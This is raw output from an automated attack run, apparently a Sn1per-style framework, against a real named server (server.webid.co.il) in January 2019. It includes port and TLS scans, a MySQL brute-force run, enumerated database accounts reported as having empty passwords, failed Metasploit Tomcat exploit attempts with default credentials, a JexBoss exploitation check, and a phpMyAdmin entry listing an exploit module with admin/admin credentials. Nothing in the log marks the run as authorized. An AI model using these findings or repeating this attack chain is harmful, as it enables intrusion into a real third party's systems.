- 11 231.01 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 12 231.03 ms 212.143.7.39
- 13 232.28 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
- 14 232.24 ms 82.166.37.254
- 15 233.54 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 16 232.25 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginSessionRenegotiation
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginCertInfo
- PluginCompression
- PluginSessionResumption
- PluginHeartbleed
- PluginChromeSha1Deprecation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 62.90.134.182:443 => 62.90.134.182:443
- SCAN RESULTS FOR 62.90.134.182:443 - 62.90.134.182:443
- ------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * OpenSSL Heartbleed:
- OK - Not vulnerable to Heartbleed
- * Certificate - Content:
- SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
- Common Name: localhost
- Issuer: localhost
- Serial Number: 99F758FFACDEEDCB
- Not Before: Sep 20 10:18:07 2014 GMT
- Not After: Feb 4 10:18:07 2042 GMT
- Signature Algorithm: sha1WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 62.90.134.182
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * TLSV1_2 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA256 - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- AES256-GCM-SHA384 - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA256 - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- AES128-GCM-SHA256 - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * TLSV1_1 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * TLSV1 Cipher Suites:
- Preferred:
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- Accepted:
- ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
- DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
- DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
- CAMELLIA256-SHA - 256 bits HTTP 200 OK
- AES256-SHA - 256 bits HTTP 200 OK
- ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
- DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
- DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
- CAMELLIA128-SHA - 128 bits HTTP 200 OK
- AES128-SHA - 128 bits HTTP 200 OK
- ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
- DES-CBC3-SHA - 112 bits HTTP 200 OK
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 19.16 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 62.90.134.182
- Testing SSL server 62.90.134.182 on port 443 using SNI name 62.90.134.182
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Sep 20 10:18:07 2014 GMT
- Not valid after: Feb 4 10:18:07 2042 GMT
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:32 EST
- NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
- NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
- NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 3306/tcp open mysql MySQL 5.5.60-MariaDB
- | mysql-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 15790 guesses in 600 seconds, average tps: 26.1
- | mysql-enum:
- | Valid usernames:
- | root:<empty> - Valid credentials
- | netadmin:<empty> - Valid credentials
- | guest:<empty> - Valid credentials
- | user:<empty> - Valid credentials
- | web:<empty> - Valid credentials
- | sysadmin:<empty> - Valid credentials
- | administrator:<empty> - Valid credentials
- | webadmin:<empty> - Valid credentials
- | admin:<empty> - Valid credentials
- | test:<empty> - Valid credentials
- |_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.60-MariaDB
- | Thread ID: 11633341
- | Capabilities flags: 63487
- | Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, LongPassword, IgnoreSigpipes, SupportsTransactions, Support41Auth, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, ODBCClient, InteractiveClient, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsCompression, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
- | Status: Autocommit
- | Salt: 5(dB[$?Q[SmLrz.t}8=g
- |_ Auth Plugin Name: mysql_native_password
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- TRACEROUTE (using port 3306/tcp)
- HOP RTT ADDRESS
- 1 144.42 ms 10.246.200.1
- 2 144.46 ms 193.9.115.113
- 3 144.47 ms 176.10.83.34
- 4 144.60 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 176.40 ms prag-bb1-link.telia.net (80.91.253.248)
- 6 176.64 ms ffm-bb3-link.telia.net (62.115.121.118)
- 7 176.44 ms ffm-b1-link.telia.net (62.115.116.164)
- 8 177.49 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 230.94 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 233.07 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 12 234.80 ms core1-0-1-0-1-gw2.hfa.nv.net.il (212.143.7.22)
- 13 233.09 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
- 14 233.07 ms 82.166.37.254
- 15 236.67 ms 82.166.37.254
- 16 237.22 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 233.68 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 7001 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://62.90.134.182:8080
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 62.90.134.182
- Testing SSL server 62.90.134.182 on port 8080 using SNI name 62.90.134.182
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:52 EST
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 8080/tcp open ssl/http-proxy Apache/2
- |_http-server-header: Apache/2
- |_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.39 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 16 hops
- TRACEROUTE (using port 8080/tcp)
- HOP RTT ADDRESS
- 1 145.20 ms 10.246.200.1
- 2 145.27 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 145.26 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 147.46 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 178.66 ms 62.115.119.72
- 6 177.40 ms ffm-bb4-link.telia.net (62.115.133.79)
- 7 176.95 ms ffm-b1-link.telia.net (62.115.137.165)
- 8 178.67 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 232.57 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 234.02 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 12 233.95 ms 212.143.7.43
- 13 235.92 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
- 14 235.89 ms 82.166.37.254
- 15 235.81 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 16 235.76 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- RHOSTS => 62.90.134.182
- RHOST => 62.90.134.182
- [-] WAR file not found
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- RPORT => 8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 62.90.134.182:8080
- [+] No File(s) found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
- [*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
- [-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] http://62.90.134.182:8080 - Authorization not requested
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://62.90.134.182:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- #######################################################################################################################################
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- | phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
- | phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
- +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
- NSE: Loaded 149 scripts for scanning.
- NSE: Script Pre-scanning.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 04:59
- Completed NSE at 04:59, 0.00s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 04:59
- Completed NSE at 04:59, 0.00s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 04:59
- Completed NSE at 04:59, 0.00s elapsed
- Initiating Ping Scan at 04:59
- Scanning 62.90.134.182 [4 ports]
- Completed Ping Scan at 04:59, 0.27s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 04:59
- Completed Parallel DNS resolution of 1 host. at 04:59, 0.02s elapsed
- Initiating Connect Scan at 04:59
- Scanning server.webid.co.il (62.90.134.182) [1000 ports]
- Discovered open port 3306/tcp on 62.90.134.182
- Discovered open port 80/tcp on 62.90.134.182
- Discovered open port 53/tcp on 62.90.134.182
- Discovered open port 995/tcp on 62.90.134.182
- Discovered open port 993/tcp on 62.90.134.182
- Discovered open port 21/tcp on 62.90.134.182
- Discovered open port 443/tcp on 62.90.134.182
- Discovered open port 110/tcp on 62.90.134.182
- Discovered open port 143/tcp on 62.90.134.182
- Discovered open port 587/tcp on 62.90.134.182
- Discovered open port 8080/tcp on 62.90.134.182
- Discovered open port 5060/tcp on 62.90.134.182
- Discovered open port 8081/tcp on 62.90.134.182
- Discovered open port 465/tcp on 62.90.134.182
- Discovered open port 2000/tcp on 62.90.134.182
- Discovered open port 2222/tcp on 62.90.134.182
- Completed Connect Scan at 04:59, 11.65s elapsed (1000 total ports)
- Initiating Service scan at 04:59
- Scanning 16 services on server.webid.co.il (62.90.134.182)
- Completed Service scan at 05:00, 21.13s elapsed (16 services on 1 host)
- Initiating OS detection (try #1) against server.webid.co.il (62.90.134.182)
- Retrying OS detection (try #2) against server.webid.co.il (62.90.134.182)
- adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
- adjust_timeouts2: packet supposedly had rtt of -503282 microseconds. Ignoring time.
- Initiating Traceroute at 05:00
- Completed Traceroute at 05:00, 3.03s elapsed
- Initiating Parallel DNS resolution of 15 hosts. at 05:00
- Completed Parallel DNS resolution of 15 hosts. at 05:00, 16.51s elapsed
- NSE: Script scanning 62.90.134.182.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 05:00
- NSE Timing: About 99.90% done; ETC: 05:01 (0:00:00 remaining)
- Completed NSE at 05:01, 33.12s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 05:01
- NSE Timing: About 90.62% done; ETC: 05:01 (0:00:03 remaining)
- NSE Timing: About 91.41% done; ETC: 05:02 (0:00:06 remaining)
- NSE Timing: About 92.19% done; ETC: 05:02 (0:00:08 remaining)
- NSE Timing: About 92.97% done; ETC: 05:03 (0:00:09 remaining)
- NSE Timing: About 94.53% done; ETC: 05:03 (0:00:09 remaining)
- NSE Timing: About 99.22% done; ETC: 05:04 (0:00:01 remaining)
- Completed NSE at 05:04, 207.31s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 05:04
- Completed NSE at 05:04, 0.00s elapsed
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up, received echo-reply ttl 47 (0.17s latency).
- Scanned at 2019-01-23 04:59:37 EST for 302s
- Not shown: 797 closed ports, 187 filtered ports
- Reason: 797 conn-refused and 187 no-responses
- PORT STATE SERVICE REASON VERSION
- 21/tcp open ftp syn-ack ProFTPD
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- |_ ftp
- | tls-nextprotoneg:
- |_ ftp
- 53/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- 80/tcp open http syn-ack nginx
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: nginx
- |_http-title: Site doesn't have a title (text/html).
- 110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
- |_pop3-capabilities: AUTH-RESP-CODE USER PIPELINING CAPA SASL(PLAIN) UIDL TOP STLS RESP-CODES
- |_ssl-date: TLS randomness does not represent time
- 143/tcp open imap syn-ack Dovecot imapd
- |_imap-capabilities: OK ID more have listed capabilities post-login LITERAL+ Pre-login IMAP4rev1 STARTTLS IDLE LOGIN-REFERRALS SASL-IR ENABLE AUTH=PLAINA0001
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/http syn-ack nginx
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: nginx
- |_http-title: Site doesn't have a title (text/html).
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/localityName=Sometown/emailAddress=webmaster@localhost/organizationalUnitName=none
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-09-20T10:18:07
- | Not valid after: 2042-02-04T10:18:07
- | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
- | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
- | -----BEGIN CERTIFICATE-----
- | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
- | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
- | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
- | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
- | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
- | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
- | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
- | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
- | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
- | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
- | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
- | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
- | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
- | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
- | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
- | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
- | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
- | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
- | Mkh66D1gfgB2ubts
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- | h2
- |_ http/1.1
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
- |_smtp-commands: Couldn't establish connection on port 465
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/localityName=Sometown/emailAddress=webaster@localhost/organizationalUnitName=none
